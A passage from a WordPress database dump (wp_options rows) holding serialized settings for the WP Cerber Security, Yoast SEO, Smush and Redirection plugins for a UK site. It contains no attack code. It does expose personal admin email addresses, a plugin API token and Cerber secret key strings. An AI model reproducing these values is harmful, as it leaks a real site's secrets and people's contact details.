(\"cerber_admin_wide\",0,\"\",0)\";i:2;d:1624621585.968493;}}','no'),(277195,'cerber-main','a:38:{s:9:\"boot-mode\";i:0;s:8:\"attempts\";i:5;s:6:\"period\";i:30;s:7:\"lockout\";i:60;s:8:\"agperiod\";i:24;s:7:\"aglocks\";i:2;s:6:\"aglast\";i:4;s:10:\"limitwhite\";i:0;s:11:\"nologinhint\";i:0;s:15:\"nologinhint_msg\";s:0:\"\";s:10:\"nopasshint\";i:0;s:14:\"nopasshint_msg\";s:0:\"\";s:5:\"proxy\";i:0;s:10:\"cookiepref\";s:0:\"\";s:6:\"subnet\";i:0;s:8:\"nonusers\";i:0;s:7:\"wplogin\";i:0;s:10:\"noredirect\";i:0;s:7:\"page404\";s:0:\"\";s:9:\"loginpath\";s:0:\"\";s:9:\"loginnowp\";i:0;s:13:\"logindeferred\";i:0;s:10:\"citadel_on\";s:1:\"1\";s:7:\"cilimit\";i:200;s:8:\"ciperiod\";i:15;s:10:\"ciduration\";i:60;s:8:\"cinotify\";s:0:\"\";s:7:\"keeplog\";i:30;s:12:\"keeplog_auth\";i:30;s:8:\"ip_extra\";s:0:\"\";s:9:\"cerberlab\";i:0;s:11:\"cerberproto\";i:0;s:7:\"usefile\";i:0;s:10:\"dateformat\";s:0:\"\";s:10:\"plain_date\";i:0;s:10:\"admin_lang\";i:0;s:14:\"top_admin_menu\";i:0;s:14:\"no_white_my_ip\";i:0;}','no'),(277196,'cerber-hardening','a:14:{s:8:\"stopenum\";s:0:\"\";s:15:\"stopenum_oembed\";s:0:\"\";s:16:\"stopenum_sitemap\";i:0;s:8:\"adminphp\";i:0;s:8:\"phpnoupl\";i:0;s:8:\"nophperr\";s:0:\"\";s:6:\"xmlrpc\";i:0;s:7:\"nofeeds\";i:0;s:10:\"norestuser\";s:0:\"\";s:6:\"norest\";i:0;s:8:\"restauth\";s:0:\"\";s:9:\"restroles\";a:1:{i:0;s:13:\"administrator\";}s:9:\"restwhite\";a:2:{i:0;s:6:\"oembed\";i:1;s:14:\"wp-site-health\";}s:9:\"cleanhead\";s:0:\"\";}','no'),(277197,'cerber-users','a:19:{s:8:\"authonly\";i:0;s:11:\"authonlyacl\";i:0;s:11:\"authonlymsg\";s:68:\"Only registered and logged in users are allowed to view this website\";s:13:\"authonlyredir\";s:0:\"\";s:8:\"regwhite\";i:0;s:12:\"regwhite_msg\";s:0:\"\";s:12:\"reglimit_num\";i:3;s:12:\"reglimit_min\";i:60;s:6:\"emrule\";i:0;s:6:\"emlist\";a:0:{}s:10:\"prohibited\";a:0:{}s:7:\"app_pwd\";s:0:\"\";s:11:\"auth_expire\";s:0:\"\";s:8:\"usersort\";s:0:\"\";s:11:\"pdata_erase\";i:0;s:14:\"pdata_sessions\";i:0;s:12:\"pdata_export\";i:0;s:9:\"pdata_act\";i:0;s:9:\"pdata_trf\";a:0:{}}','no'),(277198,'cerber-antispam','a:11:{s:8:\"botscomm\";s:0:\"\";s:7:\"botsreg\";s:1:\"0\";s:7:\"botsany\";s:1:\"0\";s:8:\"botssafe\";s:1:\"0\";s:10:\"botsnoauth\";s:0:\"\";s:11:\"botsipwhite\";s:1:\"1\";s:10:\"customcomm\";s:1:\"0\";s:9:\"botswhite\";a:0:{}s:8:\"spamcomm\";s:1:\"0\";s:10:\"trashafter\";s:1:\"7\";s:18:\"trashafter-enabled\";s:1:\"0\";}','no'),(277199,'cerber-recaptcha','a:15:{s:7:\"sitekey\";s:0:\"\";s:9:\"secretkey\";s:0:\"\";s:9:\"invirecap\";s:1:\"0\";s:10:\"recaplogin\";s:1:\"0\";s:9:\"recaplost\";s:1:\"0\";s:8:\"recapreg\";s:1:\"0\";s:13:\"recapwoologin\";s:1:\"0\";s:12:\"recapwoolost\";s:1:\"0\";s:11:\"recapwooreg\";s:1:\"0\";s:8:\"recapcom\";s:1:\"0\";s:12:\"recapcomauth\";s:1:\"0\";s:12:\"recapipwhite\";s:1:\"0\";s:16:\"recaptcha-period\";s:2:\"60\";s:16:\"recaptcha-number\";s:1:\"3\";s:16:\"recaptcha-within\";s:2:\"30\";}','no'),(277200,'cerber-notifications','a:11:{s:6:\"notify\";s:0:\"\";s:5:\"above\";i:3;s:5:\"email\";s:0:\"\";s:9:\"emailrate\";i:12;s:14:\"notify-new-ver\";s:1:\"1\";s:7:\"pbtoken\";s:0:\"\";s:8:\"pbdevice\";s:0:\"\";s:12:\"wreports-day\";s:1:\"1\";s:13:\"wreports-time\";i:9;s:12:\"email-report\";s:0:\"\";s:13:\"enable-report\";s:1:\"1\";}','no'),(277201,'cerber-traffic','a:22:{s:9:\"tienabled\";s:1:\"1\";s:9:\"tiipwhite\";i:0;s:7:\"tiwhite\";s:0:\"\";s:8:\"tierrmon\";s:1:\"1\";s:11:\"tierrnoauth\";s:0:\"\";s:6:\"timode\";s:1:\"3\";s:12:\"tilogrestapi\";i:0;s:11:\"tilogxmlrpc\";i:0;s:9:\"tinocrabs\";s:1:\"1\";s:8:\"tinolocs\";a:0:{}s:6:\"tinoua\";a:0:{}s:8:\"tifields\";i:0;s:6:\"timask\";s:0:\"\";s:6:\"tihdrs\";i:0;s:11:\"tihdrs_sent\";i:0;s:6:\"tisenv\";i:0;s:7:\"ticandy\";i:0;s:12:\"ticandy_sent\";i:0;s:8:\"tiphperr\";i:0;s:11:\"tithreshold\";s:0:\"\";s:9:\"tikeeprec\";i:30;s:14:\"tikeeprec_auth\";i:30;}','no'),(277202,'cerber-user_shield','a:9:{s:7:\"ds_4acc\";i:0;s:13:\"ds_regs_roles\";a:0:{}s:10:\"ds_add_acc\";a:1:{i:0;s:13:\"administrator\";}s:11:\"ds_edit_acc\";a:1:{i:0;s:13:\"administrator\";}s:11:\"ds_4acc_acl\";i:0;s:9:\"ds_4roles\";i:0;s:11:\"ds_add_role\";a:1:{i:0;s:13:\"administrator\";}s:12:\"ds_edit_role\";a:1:{i:0;s:13:\"administrator\";}s:13:\"ds_4roles_acl\";i:0;}','no'),(277203,'cerber-opt_shield','a:4:{s:8:\"ds_4opts\";i:0;s:14:\"ds_4opts_roles\";a:1:{i:0;s:13:\"administrator\";}s:13:\"ds_4opts_list\";a:7:{s:11:\"admin_email\";i:1;s:12:\"default_role\";i:1;s:4:\"home\";i:1;s:7:\"siteurl\";i:1;s:18:\"users_can_register\";i:1;s:14:\"active_plugins\";i:1;s:8:\"template\";i:1;}s:12:\"ds_4opts_acl\";i:0;}','no'),(277204,'cerber-scanner','a:10:{s:8:\"scan_cpt\";a:0:{}s:9:\"scan_uext\";a:0:{}s:12:\"scan_exclude\";a:0:{}s:9:\"scan_inew\";s:1:\"1\";s:9:\"scan_imod\";s:1:\"1\";s:10:\"scan_chmod\";i:0;s:8:\"scan_tmp\";i:0;s:9:\"scan_sess\";i:0;s:10:\"scan_debug\";i:0;s:13:\"scan_qcleanup\";s:2:\"30\";}','no'),(277205,'cerber-schedule','a:8:{s:11:\"scan_aquick\";i:0;s:10:\"scan_afull\";s:5:\"05:00\";s:18:\"scan_afull-enabled\";i:0;s:10:\"scan_reinc\";a:5:{i:3;i:1;i:4;i:1;i:15;i:1;i:50;i:1;i:51;i:1;}s:12:\"scan_relimit\";i:3;s:10:\"scan_isize\";i:0;s:12:\"scan_ierrors\";i:0;s:10:\"email-scan\";s:0:\"\";}','no'),(277206,'cerber-policies','a:12:{s:13:\"scan_delunatt\";s:1:\"0\";s:11:\"scan_delupl\";a:0:{}s:14:\"scan_delunwant\";s:1:\"0\";s:15:\"scan_recover_wp\";s:1:\"0\";s:15:\"scan_recover_pl\";s:1:\"0\";s:10:\"scan_media\";s:1:\"0\";s:15:\"scan_skip_media\";a:14:{i:0;s:3:\"css\";i:1;s:3:\"jpg\";i:2;s:4:\"jpeg\";i:3;s:3:\"jpe\";i:4;s:3:\"gif\";i:5;s:3:\"png\";i:6;s:3:\"bmp\";i:7;s:3:\"tif\";i:8;s:4:\"tiff\";i:9;s:3:\"ico\";i:10;s:4:\"woff\";i:11;s:5:\"woff2\";i:12;s:3:\"eot\";i:13;s:3:\"ttf\";}s:14:\"scan_del_media\";a:5:{i:0;s:3:\"php\";i:1;s:2:\"js\";i:2;s:3:\"htm\";i:3;s:4:\"html\";i:4;s:5:\"shtml\";}s:14:\"scan_nodeltemp\";s:1:\"0\";s:14:\"scan_nodelsess\";s:1:\"0\";s:13:\"scan_delexdir\";a:0:{}s:13:\"scan_delexext\";a:0:{}}','no'),(277207,'cerber-nexus_master','a:7:{s:13:\"master_tolist\";s:0:\"\";s:13:\"master_swshow\";s:0:\"\";s:14:\"master_at_site\";s:0:\"\";s:13:\"master_locale\";i:0;s:9:\"master_dt\";i:0;s:9:\"master_tz\";i:0;s:11:\"master_diag\";i:0;}','no'),(277208,'cerber-nexus-slave','a:3:{s:9:\"slave_ips\";s:0:\"\";s:12:\"slave_access\";i:2;s:10:\"slave_diag\";i:0;}','no'),(277209,'_cerber_up','a:2:{s:1:\"v\";s:5:\"8.9.6\";s:1:\"t\";i:1649844732;}','no'),(277210,'cerber_admin_info','<h1>Highlights from WP Cerber Security 8.9.6</h1><ul><li>New: A new <a href=\"https://wpcerber.com/wordpress-notifications-made-easy/\" target=\"_blank\">alert creation dialog with a set of new alert settings</a> enables you to create alerts with new limits: an expiration time, the maximum number of alerts allowed to send, and optional rate-limiting. The alert conditions can include the URL of a request now.</li><li>New: Deleting of <a href=\"https://wpcerber.com/wordpress-application-passwords-how-to/\" target=\"_blank\">WordPress application passwords</a> is logged now.</li><li>New: Ability to monitor <a href=\"https://wpcerber.com/antispam-for-wordpress-contact-forms/\" target=\"_blank\">anti-spam</a>, reCAPTCHA, and several other setting-specific events using links on the settings pages.</li><li>Improved: Meaningful and actionable messages on the log screens if no activity has been found in the logs using a given search filter.</li><li>Improved: If a WP Cerber feature requires a newer version of WordPress, such a feature will not be shown in the plugin admin interface anymore.</li><li>Fixed: A fatal PHP error occurs while logging in on a version of WordPress older than 5.5 and a user has more than one active session.</li><li>Fixed: A fatal PHP error occurs while using the reset password form on a version of WordPress older than 5.4.</li></ul><p style=\"margin-top: 18px; line-height: 1.3;\"><span class=\"dashicons-before dashicons-info-outline\"></span>  &nbsp; <a href=\"https://wpcerber.com/?plugin_version=8.9.6\" target=\"_blank\">Read more on wpcerber.com</a></p>  <h2 style=\"margin-top: 28px;\">We need your support to keep moving forward</h2>\r\n                    <table style=\"margin-top: 20px;\"><tr><td></td><td style=\"padding-top: 0;\">By sharing your unique opinion on WP Cerber, you help the engineers behind the plugin make greater progress and help other professionals find the right software. You can leave your review on one of the following websites. Feel free to use your native language. Thanks!\r\n                    </td></tr></table>\r\n                       \r\n                    <p><a href=\"https://www.trustpilot.com/review/wpcerber.com\" target=\"_blank\">Leave review on Trustpilot</a>\r\n                    &nbsp;|&nbsp; \r\n                    <a href=\"https://www.g2.com/products/cerber-security-antispam-malware-scan/reviews/start\" target=\"_blank\">Leave review on G2.COM</a><p style=\"text-align:right; padding-right: 20px;\">\r\n    		    <input type=\"button\" class=\"button button-primary cerber-dismiss\" value=\" &nbsp; Awesome! &nbsp; \"/></p>','no'),(277219,'recovery_mode_email_last_sent','1629382263','yes'),(277220,'recovery_keys','a:0:{}','yes'),(277223,'widget_media_gallery','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(277246,'https_detection_errors','a:0:{}','yes'),(277253,'finished_updating_comment_type','1','yes'),(277611,'wordfence_syncAttackDataAttempts','0','no'),(277612,'wordfence_syncingAttackData','0','no'),(277613,'wordfence_lastSyncAttackData','1675200308','no'),(277726,'_transient_health-check-site-status-result','{\"good\":15,\"recommended\":3,\"critical\":3}','yes'),(304387,'wp_page_for_privacy_policy','0','yes'),(304388,'show_comments_cookies_opt_in','','yes'),(304389,'admin_email_lifespan','1665396466','yes'),(304390,'disallowed_keys','','no'),(304391,'comment_previously_approved','','yes'),(304392,'auto_plugin_theme_update_emails','a:0:{}','no'),(304393,'auto_update_core_dev','enabled','yes'),(304394,'auto_update_core_minor','enabled','yes'),(304395,'auto_update_core_major','enabled','no'),(304396,'db_upgraded','1','yes'),(304470,'widget_block','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(304478,'wp_force_deactivated_plugins','a:0:{}','yes'),(304995,'category_children','a:0:{}','yes'),(325450,'_transient_is_multi_author','0','yes'),(325451,'_transient_hitmag_categories','2','yes'),(325489,'redirection_options','a:31:{s:7:\"support\";b:0;s:5:\"token\";s:32:\"6e3f4d5ca3ff769e61065a1a05bec706\";s:12:\"monitor_post\";i:0;s:13:\"monitor_types\";a:0:{}s:19:\"associated_redirect\";s:0:\"\";s:11:\"auto_target\";s:0:\"\";s:15:\"expire_redirect\";i:7;s:10:\"expire_404\";i:7;s:12:\"log_external\";b:0;s:10:\"log_header\";b:0;s:10:\"track_hits\";b:1;s:7:\"modules\";a:0:{}s:10:\"newsletter\";b:0;s:14:\"redirect_cache\";i:1;s:10:\"ip_logging\";i:1;s:13:\"last_group_id\";i:1;s:8:\"rest_api\";i:0;s:5:\"https\";b:0;s:7:\"headers\";a:0:{}s:8:\"database\";s:3:\"4.2\";s:8:\"relocate\";s:0:\"\";s:16:\"preferred_domain\";s:0:\"\";s:7:\"aliases\";a:0:{}s:10:\"permalinks\";a:0:{}s:9:\"cache_key\";i:0;s:13:\"plugin_update\";s:6:\"prompt\";s:13:\"update_notice\";i:0;s:10:\"flag_query\";s:5:\"exact\";s:9:\"flag_case\";b:0;s:13:\"flag_trailing\";b:0;s:10:\"flag_regex\";b:0;}','yes'),(325490,'wp-smush-settings','a:23:{s:4:\"auto\";b:1;s:5:\"lossy\";b:0;s:10:\"strip_exif\";b:1;s:6:\"resize\";b:0;s:9:\"detection\";b:0;s:8:\"original\";b:0;s:6:\"backup\";b:0;s:8:\"no_scale\";b:0;s:10:\"png_to_jpg\";b:0;s:7:\"nextgen\";b:0;s:2:\"s3\";b:0;s:9:\"gutenberg\";b:0;s:10:\"js_builder\";b:0;s:3:\"cdn\";b:0;s:11:\"auto_resize\";b:0;s:4:\"webp\";b:1;s:5:\"usage\";b:0;s:17:\"accessible_colors\";b:0;s:9:\"keep_data\";b:1;s:9:\"lazy_load\";b:0;s:17:\"background_images\";b:1;s:16:\"rest_api_support\";b:0;s:8:\"webp_mod\";b:0;}','yes'),(325491,'wp-smush-install-type','existing','no'),(325492,'wp-smush-version','3.9.5','no'),(325504,'wdev-frash','a:3:{s:7:\"plugins\";a:1:{s:23:\"wp-smushit/wp-smush.php\";i:1649844644;}s:5:\"queue\";a:2:{s:32:\"7de3619981caadc55f30a002bfb299f6\";a:4:{s:6:\"plugin\";s:23:\"wp-smushit/wp-smush.php\";s:4:\"type\";s:5:\"email\";s:7:\"show_at\";i:1649844644;s:6:\"sticky\";b:1;}s:32:\"fc50097023d0d34c5a66f6cddcf77694\";a:3:{s:6:\"plugin\";s:23:\"wp-smushit/wp-smush.php\";s:4:\"type\";s:4:\"rate\";s:7:\"show_at\";i:1650449444;}}s:4:\"done\";a:0:{}}','no'),(325505,'wpmudev_recommended_plugins_registered','a:1:{s:23:\"wp-smushit/wp-smush.php\";a:1:{s:13:\"registered_at\";i:1649844644;}}','no'),(325520,'cerber-antibot','','no'),(325521,'cerber-groove','M15prJ9hxIiToAg0','no'),(325522,'cerber-groove-x','a:2:{i:0;s:28:\"aV4W1kjPeiXLKouA8xQR9rU23l5g\";i:1;s:32:\"lsSb8j6cvBoTI17KzUHuAqa5yRGZpEer\";}','no'),(325531,'yoast_migrations_free','a:1:{s:7:\"version\";s:6:\"18.5.1\";}','yes'),(325532,'wpseo','a:56:{s:8:\"tracking\";b:0;s:22:\"license_server_version\";b:0;s:15:\"ms_defaults_set\";b:0;s:40:\"ignore_search_engines_discouraged_notice\";b:0;s:19:\"indexing_first_time\";b:1;s:16:\"indexing_started\";b:0;s:15:\"indexing_reason\";s:23:\"home_url_option_changed\";s:29:\"indexables_indexing_completed\";b:0;s:7:\"version\";s:6:\"18.5.1\";s:16:\"previous_version\";s:0:\"\";s:20:\"disableadvanced_meta\";b:1;s:30:\"enable_headless_rest_endpoints\";b:1;s:17:\"ryte_indexability\";b:1;s:11:\"baiduverify\";s:0:\"\";s:12:\"googleverify\";s:0:\"\";s:8:\"msverify\";s:0:\"\";s:12:\"yandexverify\";s:0:\"\";s:9:\"site_type\";s:0:\"\";s:20:\"has_multiple_authors\";s:0:\"\";s:16:\"environment_type\";s:0:\"\";s:23:\"content_analysis_active\";b:1;s:23:\"keyword_analysis_active\";b:1;s:21:\"enable_admin_bar_menu\";b:1;s:26:\"enable_cornerstone_content\";b:1;s:18:\"enable_xml_sitemap\";b:1;s:24:\"enable_text_link_counter\";b:1;s:22:\"show_onboarding_notice\";b:1;s:18:\"first_activated_on\";i:1649844743;s:13:\"myyoast-oauth\";b:0;s:26:\"semrush_integration_active\";b:1;s:14:\"semrush_tokens\";a:0:{}s:20:\"semrush_country_code\";s:2:\"us\";s:19:\"permalink_structure\";s:16:\"/blog/%postname%\";s:8:\"home_url\";s:28:\"https://www.dailyjolly.co.uk\";s:18:\"dynamic_permalinks\";b:0;s:17:\"category_base_url\";s:0:\"\";s:12:\"tag_base_url\";s:0:\"\";s:21:\"custom_taxonomy_slugs\";a:0:{}s:29:\"enable_enhanced_slack_sharing\";b:1;s:25:\"zapier_integration_active\";b:0;s:19:\"zapier_subscription\";a:0:{}s:14:\"zapier_api_key\";s:0:\"\";s:23:\"enable_metabox_insights\";b:1;s:23:\"enable_link_suggestions\";b:1;s:26:\"algolia_integration_active\";b:0;s:14:\"import_cursors\";a:0:{}s:13:\"workouts_data\";a:1:{s:13:\"configuration\";a:1:{s:13:\"finishedSteps\";a:0:{}}}s:36:\"dismiss_configuration_workout_notice\";b:0;s:19:\"importing_completed\";a:0:{}s:26:\"wincher_integration_active\";b:1;s:14:\"wincher_tokens\";a:0:{}s:36:\"wincher_automatically_add_keyphrases\";b:0;s:18:\"wincher_website_id\";s:0:\"\";s:18:\"first_time_install\";b:1;s:34:\"should_redirect_after_install_free\";b:1;s:34:\"activation_redirect_timestamp_free\";b:0;}','yes'),(325533,'wpseo_titles','a:106:{s:17:\"forcerewritetitle\";b:0;s:9:\"separator\";s:7:\"sc-dash\";s:16:\"title-home-wpseo\";s:42:\"%%sitename%% %%page%% %%sep%% %%sitedesc%%\";s:18:\"title-author-wpseo\";s:41:\"%%name%%, Author at %%sitename%% %%page%%\";s:19:\"title-archive-wpseo\";s:38:\"%%date%% %%page%% %%sep%% %%sitename%%\";s:18:\"title-search-wpseo\";s:63:\"You searched for %%searchphrase%% %%page%% %%sep%% %%sitename%%\";s:15:\"title-404-wpseo\";s:35:\"Page not found %%sep%% %%sitename%%\";s:25:\"social-title-author-wpseo\";s:8:\"%%name%%\";s:26:\"social-title-archive-wpseo\";s:8:\"%%date%%\";s:31:\"social-description-author-wpseo\";s:0:\"\";s:32:\"social-description-archive-wpseo\";s:0:\"\";s:29:\"social-image-url-author-wpseo\";s:0:\"\";s:30:\"social-image-url-archive-wpseo\";s:0:\"\";s:28:\"social-image-id-author-wpseo\";i:0;s:29:\"social-image-id-archive-wpseo\";i:0;s:19:\"metadesc-home-wpseo\";s:0:\"\";s:21:\"metadesc-author-wpseo\";s:0:\"\";s:22:\"metadesc-archive-wpseo\";s:0:\"\";s:9:\"rssbefore\";s:0:\"\";s:8:\"rssafter\";s:53:\"The post %%POSTLINK%% appeared first on %%BLOGLINK%%.\";s:20:\"noindex-author-wpseo\";b:0;s:28:\"noindex-author-noposts-wpseo\";b:1;s:21:\"noindex-archive-wpseo\";b:1;s:14:\"disable-author\";b:0;s:12:\"disable-date\";b:0;s:19:\"disable-post_format\";b:0;s:18:\"disable-attachment\";b:1;s:20:\"breadcrumbs-404crumb\";s:25:\"Error 404: Page not found\";s:29:\"breadcrumbs-display-blog-page\";b:1;s:20:\"breadcrumbs-boldlast\";b:0;s:25:\"breadcrumbs-archiveprefix\";s:12:\"Archives for\";s:18:\"breadcrumbs-enable\";b:1;s:16:\"breadcrumbs-home\";s:4:\"Home\";s:18:\"breadcrumbs-prefix\";s:0:\"\";s:24:\"breadcrumbs-searchprefix\";s:16:\"You searched for\";s:15:\"breadcrumbs-sep\";s:7:\"&raquo;\";s:12:\"website_name\";s:0:\"\";s:11:\"person_name\";s:0:\"\";s:11:\"person_logo\";s:0:\"\";s:22:\"alternate_website_name\";s:0:\"\";s:12:\"company_logo\";s:0:\"\";s:12:\"company_name\";s:0:\"\";s:17:\"company_or_person\";s:7:\"company\";s:25:\"company_or_person_user_id\";b:0;s:17:\"stripcategorybase\";b:0;s:26:\"open_graph_frontpage_title\";s:12:\"%%sitename%%\";s:25:\"open_graph_frontpage_desc\";s:0:\"\";s:26:\"open_graph_frontpage_image\";s:0:\"\";s:10:\"title-post\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:13:\"metadesc-post\";s:0:\"\";s:12:\"noindex-post\";b:0;s:23:\"display-metabox-pt-post\";b:1;s:23:\"post_types-post-maintax\";i:0;s:21:\"schema-page-type-post\";s:7:\"WebPage\";s:24:\"schema-article-type-post\";s:7:\"Article\";s:17:\"social-title-post\";s:9:\"%%title%%\";s:23:\"social-description-post\";s:0:\"\";s:21:\"social-image-url-post\";s:0:\"\";s:20:\"social-image-id-post\";i:0;s:10:\"title-page\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:13:\"metadesc-page\";s:0:\"\";s:12:\"noindex-page\";b:0;s:23:\"display-metabox-pt-page\";b:1;s:23:\"post_types-page-maintax\";i:0;s:21:\"schema-page-type-page\";s:7:\"WebPage\";s:24:\"schema-article-type-page\";s:4:\"None\";s:17:\"social-title-page\";s:9:\"%%title%%\";s:23:\"social-description-page\";s:0:\"\";s:21:\"social-image-url-page\";s:0:\"\";s:20:\"social-image-id-page\";i:0;s:16:\"title-attachment\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:19:\"metadesc-attachment\";s:0:\"\";s:18:\"noindex-attachment\";b:0;s:29:\"display-metabox-pt-attachment\";b:1;s:29:\"post_types-attachment-maintax\";i:0;s:27:\"schema-page-type-attachment\";s:7:\"WebPage\";s:30:\"schema-article-type-attachment\";s:4:\"None\";s:18:\"title-tax-category\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tax-category\";s:0:\"\";s:28:\"display-metabox-tax-category\";b:1;s:20:\"noindex-tax-category\";b:0;s:25:\"social-title-tax-category\";s:23:\"%%term_title%% Archives\";s:31:\"social-description-tax-category\";s:0:\"\";s:29:\"social-image-url-tax-category\";s:0:\"\";s:28:\"social-image-id-tax-category\";i:0;s:18:\"title-tax-post_tag\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tax-post_tag\";s:0:\"\";s:28:\"display-metabox-tax-post_tag\";b:1;s:20:\"noindex-tax-post_tag\";b:0;s:25:\"social-title-tax-post_tag\";s:23:\"%%term_title%% Archives\";s:31:\"social-description-tax-post_tag\";s:0:\"\";s:29:\"social-image-url-tax-post_tag\";s:0:\"\";s:28:\"social-image-id-tax-post_tag\";i:0;s:21:\"title-tax-post_format\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:24:\"metadesc-tax-post_format\";s:0:\"\";s:31:\"display-metabox-tax-post_format\";b:1;s:23:\"noindex-tax-post_format\";b:1;s:28:\"social-title-tax-post_format\";s:23:\"%%term_title%% Archives\";s:34:\"social-description-tax-post_format\";s:0:\"\";s:32:\"social-image-url-tax-post_format\";s:0:\"\";s:31:\"social-image-id-tax-post_format\";i:0;s:14:\"person_logo_id\";i:0;s:15:\"company_logo_id\";i:0;s:17:\"company_logo_meta\";b:0;s:16:\"person_logo_meta\";b:0;s:29:\"open_graph_frontpage_image_id\";i:0;}','yes'),(325534,'wpseo_social','a:18:{s:13:\"facebook_site\";s:0:\"\";s:13:\"instagram_url\";s:0:\"\";s:12:\"linkedin_url\";s:0:\"\";s:11:\"myspace_url\";s:0:\"\";s:16:\"og_default_image\";s:0:\"\";s:19:\"og_default_image_id\";s:0:\"\";s:18:\"og_frontpage_title\";s:0:\"\";s:17:\"og_frontpage_desc\";s:0:\"\";s:18:\"og_frontpage_image\";s:0:\"\";s:21:\"og_frontpage_image_id\";s:0:\"\";s:9:\"opengraph\";b:1;s:13:\"pinterest_url\";s:0:\"\";s:15:\"pinterestverify\";s:0:\"\";s:7:\"twitter\";b:1;s:12:\"twitter_site\";s:0:\"\";s:17:\"twitter_card_type\";s:19:\"summary_large_image\";s:11:\"youtube_url\";s:0:\"\";s:13:\"wikipedia_url\";s:0:\"\";}','yes'),(325552,'wp-smush-hide-conflict-notice','1','yes'),(325576,'new_admin_email','amber.platts@vanillacircus.co.uk','yes'),(325577,'adminhash','a:2:{s:4:\"hash\";s:32:\"3d5f403472b5897e661fc9b1d139c50a\";s:8:\"newemail\";s:23:\"bensykes@bensykes.co.uk\";}','yes'),(325578,'https_migration_required','1','yes'),(325587,'rewrite_rules','a:97:{s:19:\"sitemap_index\\.xml$\";s:19:\"index.php?sitemap=1\";s:31:\"([^/]+?)-sitemap([0-9]+)?\\.xml$\";s:51:\"index.php?sitemap=$matches[1]&sitemap_n=$matches[2]\";s:24:\"([a-z]+)?-?sitemap\\.xsl$\";s:39:\"index.php?yoast-sitemap-xsl=$matches[1]\";s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:17:\"^wp-sitemap\\.xml$\";s:23:\"index.php?sitemap=index\";s:17:\"^wp-sitemap\\.xsl$\";s:36:\"index.php?sitemap-stylesheet=sitemap\";s:23:\"^wp-sitemap-index\\.xsl$\";s:34:\"index.php?sitemap-stylesheet=index\";s:48:\"^wp-sitemap-([a-z]+?)-([a-z\\d_-]+?)-(\\d+?)\\.xml$\";s:75:\"index.php?sitemap=$matches[1]&sitemap-subtype=$matches[2]&paged=$matches[3]\";s:34:\"^wp-sitemap-([a-z]+?)-(\\d+?)\\.xml$\";s:47:\"index.php?sitemap=$matches[1]&paged=$matches[2]\";s:52:\"blog/category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:47:\"blog/category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:28:\"blog/category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:40:\"blog/category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:22:\"blog/category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:49:\"blog/tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:44:\"blog/tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:25:\"blog/tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:37:\"blog/tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:19:\"blog/tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:50:\"blog/type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:45:\"blog/type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:26:\"blog/type/([^/]+)/embed/?$\";s:44:\"index.php?post_format=$matches[1]&embed=true\";s:38:\"blog/type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:20:\"blog/type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:13:\"favicon\\.ico$\";s:19:\"index.php?favicon=1\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:8:\"embed/?$\";s:21:\"index.php?&embed=true\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:27:\"comment-page-([0-9]{1,})/?$\";s:39:\"index.php?&page_id=14&cpage=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:17:\"comments/embed/?$\";s:21:\"index.php?&embed=true\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:20:\"search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=